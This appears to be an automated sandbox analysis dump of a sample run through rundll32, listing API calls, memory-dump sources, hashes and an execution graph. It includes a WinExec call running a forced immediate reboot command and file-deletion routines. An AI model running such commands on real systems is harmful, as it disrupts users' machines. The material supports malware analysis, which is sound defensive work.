                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,04603D3A,04603E04,00000000,04603E2C,?,?,00000000,00000000,?,?,04605E55), ref: 043E68C8
                              • GetLastError.KERNEL32(00000000,?,?,?,?,04603D3A,04603E04,00000000,04603E2C,?,?,00000000,00000000,?,?,04605E55), ref: 043E68D7
                              • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,04603D3A,04603E04,00000000,04603E2C,?,?,00000000,00000000,?), ref: 043E68DF
                              • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,04603D3A,04603E04,00000000,04603E2C,?,?,00000000,00000000,?), ref: 043E68FA
                              • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,?,?,04603D3A,04603E04,00000000,04603E2C,?,?,00000000,00000000,?), ref: 043E6908
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                              • String ID:
                              • API String ID: 2814369299-0
                              • Opcode ID: 9b7ef98bdcdfc04959bc34be0926f2be6abfb9d61081f11479c35cf3ac9964d4
                              • Instruction ID: c85fdfd28eaa8d65b7f97ac72db643691e92baba0424f84aef75424e537b8298
                              • Opcode Fuzzy Hash: 9b7ef98bdcdfc04959bc34be0926f2be6abfb9d61081f11479c35cf3ac9964d4
                              • Instruction Fuzzy Hash: F6F06593342BA819BE603A7D2C87B7E554CCE4267DB542635FE70C71D2DA167C0AC261
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • UnhookWindowsHookEx.USER32(00000000), ref: 045B56E6
                              • SetEvent.KERNEL32(00000000), ref: 045B5712
                              • GetCurrentThreadId.KERNEL32 ref: 045B5717
                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 045B5740
                              • CloseHandle.KERNEL32(00000000,00000000), ref: 045B574D
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                              • String ID:
                              • API String ID: 2132507429-0
                              • Opcode ID: f922f5ee368201d680f48056d6e649640cc9251d9248e269966ca1339df10667
                              • Instruction ID: 56fb928e6826273fbc3cc082563bc12f400e9aa4de2bdd28a244dd3ab5361f2a
                              • Opcode Fuzzy Hash: f922f5ee368201d680f48056d6e649640cc9251d9248e269966ca1339df10667
                              • Instruction Fuzzy Hash: F4014F71644701BFE719EFA4EA49B5A33E8FF44318F005525AAB4D61D0FB35B840EB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • Sleep.KERNEL32(00002328,00000000,04605927,?,?,04603DEF,.exe,04605E82,0000012C,0000001E,04603E04,00000000,04603E2C,?,?,00000000), ref: 046058FE
                              • WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0460590A
                              • Sleep.KERNEL32(0000012C,00002328,00000000,04605927,?,?,04603DEF,.exe,04605E82,0000012C,0000001E,04603E04,00000000,04603E2C,?,?), ref: 04605914
                              Strings
                              • C:\WINDOWS\system32\shutdown.exe -r -t 1 -f, xrefs: 04605905
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep$Exec
                              • String ID: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
                              • API String ID: 1325486322-941748481
                              • Opcode ID: e0d72c60814492d0e2adfe32615b737a9f187b2680d79c670838acaae1a74525
                              • Instruction ID: 65e8164fdbabf71b94f671e6439b1ac71d5123227bd19c6603ef601721499746
                              • Opcode Fuzzy Hash: e0d72c60814492d0e2adfe32615b737a9f187b2680d79c670838acaae1a74525
                              • Instruction Fuzzy Hash: C0D01235344744BAF2166B665C17B277A48D749F24F915461F50155DC0E99538108C65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 043CDD89
                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 043CDDE7
                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 043CDE44
                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 043CDE77
                                • Part of subcall function 043CDD34: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,043CDDF5), ref: 043CDD4B
                                • Part of subcall function 043CDD34: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,043CDDF5), ref: 043CDD68
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Thread$LanguagesPreferred$Language
                              • String ID:
                              • API String ID: 2255706666-0
                              • Opcode ID: 3c1527e393cfe9753337e07f62af6e14638b7cfe4a9bce8ec3e9c410623abe3e
                              • Instruction ID: c66d25da0a1d07e81b1339cba19e000bce03c1306ffc19fc983a15983ded9e55
                              • Opcode Fuzzy Hash: 3c1527e393cfe9753337e07f62af6e14638b7cfe4a9bce8ec3e9c410623abe3e
                              • Instruction Fuzzy Hash: D3313C70E0021ADBDB10DFA8C884AEEB3B5FF14314F54657AE515E7291EB74AE05CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindow.USER32(?,00000004), ref: 045B64E6
                              • GetWindowThreadProcessId.USER32(?,?), ref: 045B6503
                              • GetCurrentProcessId.KERNEL32(?,00000004), ref: 045B650F
                              • IsWindowVisible.USER32(?), ref: 045B6569
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Window$Process$CurrentThreadVisible
                              • String ID:
                              • API String ID: 3926708836-0
                              • Opcode ID: 916a6ed72041ff0a0b3c641dfdca33ca927d389ac0d2ec446ab393a8d985591d
                              • Instruction ID: 8841030ccbd5c893b33b56dddece2c3a41fdf95cbafb61c5ea8d79bf1e4df5e3
                              • Opcode Fuzzy Hash: 916a6ed72041ff0a0b3c641dfdca33ca927d389ac0d2ec446ab393a8d985591d
                              • Instruction Fuzzy Hash: 60319C31600205ABDB20EF98E9C5FAA73A4FB14314F4481B1ED54E7786EB35FD509B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetActiveWindow.USER32(?,?,046201D8,045B7DC8), ref: 045B714E
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: ActiveWindow
                              • String ID:
                              • API String ID: 2558294473-0
                              • Opcode ID: 3a3482db3d3017f85c8397938c9e80ebde1f586c6287a5805f17761587ae5c45
                              • Instruction ID: 35cc25af97670a78fcb278a58a1036aea8c17721115a3a8315c83f30961dc4ff
                              • Opcode Fuzzy Hash: 3a3482db3d3017f85c8397938c9e80ebde1f586c6287a5805f17761587ae5c45
                              • Instruction Fuzzy Hash: 97313E70600241ABEB54EE68D8C4BDE33A67F88708F0454B5AD45DF28ADB64FC85E7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(045B61C0), ref: 045B62B1
                              • GetWindow.USER32(00000003,00000003), ref: 045B62C9
                              • GetWindowLongW.USER32(00000000,000000EC), ref: 045B62D6
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 045B6315
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Window$EnumLongWindows
                              • String ID:
                              • API String ID: 4191631535-0
                              • Opcode ID: c026712d68cf2630b86f74f23b26af2a74d0c28a36476605d6b00b76c149c1a8
                              • Instruction ID: 54f39ba742c067a627c20f08770446ea7eecbd6926bc39b402bd26c784cca6de
                              • Opcode Fuzzy Hash: c026712d68cf2630b86f74f23b26af2a74d0c28a36476605d6b00b76c149c1a8
                              • Instruction Fuzzy Hash: AD117031604710AFEB10AE289C85F997794EF45724F144174F9E89F2D1C760A845D7A6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindowThreadProcessId.USER32(00000000), ref: 044F3E7D
                              • GetCurrentProcessId.KERNEL32(?,?,00000000,045B985D,?,?,?,00000001,045B7A37), ref: 044F3E86
                              • GlobalFindAtomW.KERNEL32(00000000), ref: 044F3E9B
                              • GetPropW.USER32(00000000,00000000), ref: 044F3EB2
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                              • String ID:
                              • API String ID: 2582817389-0
                              • Opcode ID: e2266c45101151fe429a79551219aefdf54b983af026b0e8d1228ecae016f5f7
                              • Instruction ID: 1d5395f5b2b48c5683457795631a80500ad2e15a3327c8be1815c4db3dbfe1d3
                              • Opcode Fuzzy Hash: e2266c45101151fe429a79551219aefdf54b983af026b0e8d1228ecae016f5f7
                              • Instruction Fuzzy Hash: DBF0307230026176BF31BEB56D8182F728CCE046AD3002826FE15C7242E729FC49C774
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:3.9%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:855
                              Total number of Limit Nodes:23
                              execution_graph 11598 3ff8c7b 11603 3ff8bd4 11598->11603 11600 3ff8c9f 11601 3ff8cc0 CompareStringW 11600->11601 11602 3ff8ce1 11601->11602 11606 40001f4 11603->11606 11609 4000164 11606->11609 11608 3ff8be6 11608->11600 11610 4000185 11609->11610 11612 40001ab 11610->11612 11613 3ffff18 11610->11613 11612->11608 11614 3ffff4a 11613->11614 11615 3ffff2d 11613->11615 11614->11612 11616 3ffff88 11615->11616 11618 3ffff35 11615->11618 11621 40002d4 MultiByteToWideChar 11616->11621 11620 40002d4 MultiByteToWideChar 11618->11620 11620->11614 11621->11614 11622 4001df4 11623 4001e9b 11622->11623 11624 4001e1a 11622->11624 11624->11623 11626 4001a04 11624->11626 11627 4001a2f 11626->11627 11628 4001aa0 RaiseException 11627->11628 11629 4001ac8 11627->11629 11645 4001b35 11628->11645 11630 4001b68 11629->11630 11631 4001b5d LoadLibraryA 11629->11631 11636 4001bfe 11629->11636 11629->11645 11634 4001bb7 11630->11634 11635 4001b6c GetLastError 11630->11635 11631->11630 11632 4001c67 11633 4001c6b GetLastError 11632->11633 11632->11645 11638 4001c7c 11633->11638 11642 4001bc5 11634->11642 11643 4001bf8 FreeLibrary 11634->11643 11639 4001b7d 11635->11639 11636->11632 11637 4001c5b GetProcAddress 11636->11637 11636->11645 11637->11632 11640 4001c8e RaiseException 11638->11640 11638->11645 11639->11634 11641 4001b8f RaiseException 11639->11641 11640->11645 11641->11645 11642->11636 11644 4001bcb LocalAlloc 11642->11644 11643->11636 11644->11636 11646 4001bdb 11644->11646 11645->11624 11646->11636 11647 3ffd658 11648 3ffd668 GetModuleFileNameW 11647->11648 11649 3ffd684 11647->11649 11651 3ffe8cc GetModuleFileNameW 11648->11651 11652 3ffe91a 11651->11652 11657 3ffe7a8 11652->11657 11654 3ffe946 11655 3ffe958 LoadLibraryExW 11654->11655 11656 3ffe960 11654->11656 11655->11656 11656->11649 11660 3ffe7c9 11657->11660 11658 3ffe851 11658->11654 11660->11658 11675 3ffe4e4 11660->11675 11661 3ffe83e 11662 3ffe844 11661->11662 11663 3ffe853 GetUserDefaultUILanguage 11661->11663 11665 3ffe610 2 API calls 11662->11665 11679 3ffde94 EnterCriticalSection 11663->11679 11665->11658 11666 3ffe860 11699 3ffe610 11666->11699 11668 3ffe86d 11669 3ffe895 11668->11669 11670 3ffe87b GetSystemDefaultUILanguage 11668->11670 11669->11658 11703 3ffe6dc 11669->11703 11671 3ffde94 17 API calls 11670->11671 11673 3ffe888 11671->11673 11674 3ffe610 2 API calls 11673->11674 11674->11669 11676 3ffe506 11675->11676 11678 3ffe510 11675->11678 11711 3ffe1c8 11676->11711 11678->11661 11680 3ffdee0 LeaveCriticalSection 11679->11680 11681 3ffdec0 11679->11681 11748 3ffad14 11680->11748 11683 3ffded1 LeaveCriticalSection 11681->11683 11692 3ffdf82 11683->11692 11684 3ffdef1 IsValidLocale 11685 3ffdf4f EnterCriticalSection 11684->11685 11686 3ffdf00 11684->11686 11687 3ffdf67 11685->11687 11688 3ffdf09 11686->11688 11689 3ffdf14 11686->11689 11695 3ffdf78 LeaveCriticalSection 11687->11695 11750 3ffdd78 GetThreadUILanguage 11688->11750 11763 3ffdb7c 11689->11763 11692->11666 11693 3ffdf1d GetSystemDefaultUILanguage 11693->11685 11694 3ffdf27 11693->11694 11696 3ffdf38 GetSystemDefaultUILanguage 11694->11696 11695->11692 11697 3ffdb7c 3 API calls 11696->11697 11698 3ffdf12 11697->11698 11698->11685 11701 3ffe62e 11699->11701 11700 3ffe6a9 11700->11668 11701->11700 11772 3ffe5a4 11701->11772 11777 3ffadf8 11703->11777 11706 3ffe72c 11707 3ffe5a4 2 API calls 11706->11707 11708 3ffe740 11707->11708 11709 3ffe76e 11708->11709 11710 3ffe5a4 2 API calls 11708->11710 11709->11658 11710->11709 11712 3ffe1df 11711->11712 11713 3ffe1f3 GetModuleFileNameW 11712->11713 11714 3ffe208 11712->11714 11713->11714 11715 3ffe230 RegOpenKeyExW 11714->11715 11720 3ffe3d7 11714->11720 11716 3ffe257 RegOpenKeyExW 11715->11716 11717 3ffe2f1 11715->11717 11716->11717 11718 3ffe275 RegOpenKeyExW 11716->11718 11732 3ffdfd8 GetModuleHandleW 11717->11732 11718->11717 11721 3ffe293 RegOpenKeyExW 11718->11721 11720->11678 11721->11717 11723 3ffe2b1 RegOpenKeyExW 11721->11723 11722 3ffe30f RegQueryValueExW 11724 3ffe32d 11722->11724 11725 3ffe360 RegQueryValueExW 11722->11725 11723->11717 11727 3ffe2cf RegOpenKeyExW 11723->11727 11728 3ffe335 RegQueryValueExW 11724->11728 11726 3ffe37c 11725->11726 11731 3ffe35e 11725->11731 11729 3ffe384 RegQueryValueExW 11726->11729 11727->11717 11727->11720 11728->11731 11729->11731 11730 3ffe3c6 RegCloseKey 11730->11678 11731->11730 11733 3ffe011 11732->11733 11734 3ffe000 GetProcAddress 11732->11734 11738 3ffe027 11733->11738 11740 3ffe073 11733->11740 11744 3ffdfb4 11733->11744 11734->11733 11737 3ffdfb4 CharNextW 11737->11740 11738->11722 11739 3ffdfb4 CharNextW 11739->11740 11740->11738 11740->11739 11741 3ffe0f8 FindFirstFileW 11740->11741 11743 3ffe162 lstrlenW 11740->11743 11741->11738 11742 3ffe114 FindClose lstrlenW 11741->11742 11742->11738 11742->11740 11743->11740 11745 3ffdfc2 11744->11745 11746 3ffdfd0 11745->11746 11747 3ffdfba CharNextW 11745->11747 11746->11737 11746->11738 11747->11745 11749 3ffad1a 11748->11749 11749->11684 11751 3ffdded 11750->11751 11752 3ffdd94 11750->11752 11754 3ffdd34 2 API calls 11751->11754 11768 3ffdd34 GetThreadPreferredUILanguages 11752->11768 11756 3ffddf5 11754->11756 11757 3ffde3c SetThreadPreferredUILanguages 11756->11757 11762 3ffde7d 11756->11762 11759 3ffdd34 2 API calls 11757->11759 11760 3ffde52 11759->11760 11761 3ffde6d SetThreadPreferredUILanguages 11760->11761 11760->11762 11761->11762 11762->11698 11767 3ffdbb7 11763->11767 11764 3ffdc20 IsValidLocale 11765 3ffdc6e 11764->11765 11766 3ffdc33 GetLocaleInfoW GetLocaleInfoW 11764->11766 11765->11693 11766->11765 11767->11764 11767->11765 11769 3ffdd6e SetThreadPreferredUILanguages 11768->11769 11770 3ffdd55 11768->11770 11769->11751 11771 3ffdd5e GetThreadPreferredUILanguages 11770->11771 11771->11769 11773 3ffe5b9 11772->11773 11774 3ffe5d6 FindFirstFileW 11773->11774 11775 3ffe5e6 FindClose 11774->11775 11776 3ffe5ec 11774->11776 11775->11776 11776->11701 11778 3ffadfc GetUserDefaultUILanguage GetLocaleInfoW 11777->11778 11778->11706 11779 4237184 11780 4237192 11779->11780 11794 41e7bd4 11780->11794 11782 42371ab 11783 41e7bd4 10 API calls 11782->11783 11784 42371be 11783->11784 11785 41e7bd4 10 API calls 11784->11785 11786 42371d1 11785->11786 11787 41e7bd4 10 API calls 11786->11787 11788 42371e4 11787->11788 11789 41e7bd4 10 API calls 11788->11789 11790 42371f7 11789->11790 11800 41e7d30 11790->11800 11792 42371fe 11813 41e7aa4 11792->11813 11796 41e7bee 11794->11796 11795 41e7cef 11795->11782 11796->11795 11797 41e7ca9 GetWindowLongW SetWindowLongW 11796->11797 11798 41e7cd1 11796->11798 11797->11798 11817 41da980 GetWindowLongW 11798->11817 11802 41e7d5c 11800->11802 11801 41e7e29 11801->11792 11802->11801 11805 41e7d77 11802->11805 11828 41df3e4 11802->11828 11804 41e7ddf 11804->11801 11861 41e7abc 11804->11861 11805->11804 11806 41e7dc0 11805->11806 11808 41e7de1 11805->11808 11832 41e7120 11806->11832 11857 41dd8b4 11808->11857 11814 41e7aaa 11813->11814 11815 41e7990 128 API calls 11814->11815 11816 41e7ab7 11814->11816 11815->11814 11816->11792 11818 41da999 11817->11818 11819 41da9bb IsIconic IsWindowVisible 11818->11819 11820 41daa3c 11818->11820 11821 41da9ee 11819->11821 11822 41da9e6 ShowWindow 11819->11822 11820->11795 11823 41daa03 SetWindowLongW 11821->11823 11824 41da9f2 SetWindowLongW 11821->11824 11822->11821 11825 41daa12 11823->11825 11824->11825 11825->11820 11826 41daa2a ShowWindow 11825->11826 11827 41daa34 ShowWindow 11825->11827 11826->11820 11827->11820 11829 41df41f 11828->11829 11830 41df3f2 11828->11830 11829->11805 11830->11829 11831 41df419 ShowWindow 11830->11831 11831->11829 11866 41da8fc 11832->11866 11834 41e712f 11835 41e718a 11834->11835 11869 41e6384 11834->11869 11835->11804 11854 41e2be8 11835->11854 11837 41e713e 11838 41e7147 SetActiveWindow 11837->11838 11839 41e7153 11837->11839 11838->11839 11872 41e65e0 11839->11872 11841 41e7160 11842 41e719b 11841->11842 11845 41e7169 11841->11845 11843 41e8c04 2 API calls 11842->11843 11848 41e71a8 11843->11848 11844 41e721b 11890 41e57b4 11844->11890 11845->11835 11887 41e8c04 IsWindowEnabled 11845->11887 11848->11844 11851 41e71c5 IsWindowEnabled 11848->11851 11850 41df3e4 ShowWindow 11850->11835 11851->11844 11852 41e71cf 11851->11852 11853 41e71f4 SetWindowPos DefWindowProcW 11852->11853 11853->11835 11855 41dd8b4 77 API calls 11854->11855 11856 41e2bf4 11855->11856 11856->11804 11858 41dd8da 11857->11858 11860 41dd8c4 11857->11860 11858->11860 12063 41df424 11858->12063 11860->11804 12133 41e7990 PeekMessageW 11861->12133 11864 41e7ad8 11864->11804 11867 41da90a 11866->11867 11868 41da917 IsIconic 11866->11868 11867->11834 11868->11834 11898 41e6284 11869->11898 11873 41e65fc 11872->11873 11875 41e669a 11872->11875 11874 41e6604 11873->11874 11878 41e66a5 11873->11878 11874->11875 11876 41e6618 EnumWindows 11874->11876 11875->11841 11879 41e6629 11876->11879 11881 41e666b 11876->11881 11950 41e64d4 GetWindow 11876->11950 11877 41e670f 11877->11875 11880 409f720 71 API calls 11877->11880 11878->11875 11878->11877 11882 41e66f8 ShowWindow 11878->11882 11879->11881 11885 41e6654 ShowWindow 11879->11885 11883 41e6732 ShowOwnedPopups 11880->11883 11881->11875 11884 409f720 71 API calls 11881->11884 11882->11877 11882->11882 11883->11875 11883->11877 11886 41e668e ShowOwnedPopups 11884->11886 11885->11881 11885->11885 11886->11875 11886->11881 11888 41e7180 11887->11888 11889 41e8c24 EnableWindow 11887->11889 11888->11850 11889->11888 12059 41e5758 SystemParametersInfoW 11890->12059 11893 41e57cd ShowWindow 11895 41e57df 11893->11895 11896 41e57d8 11893->11896 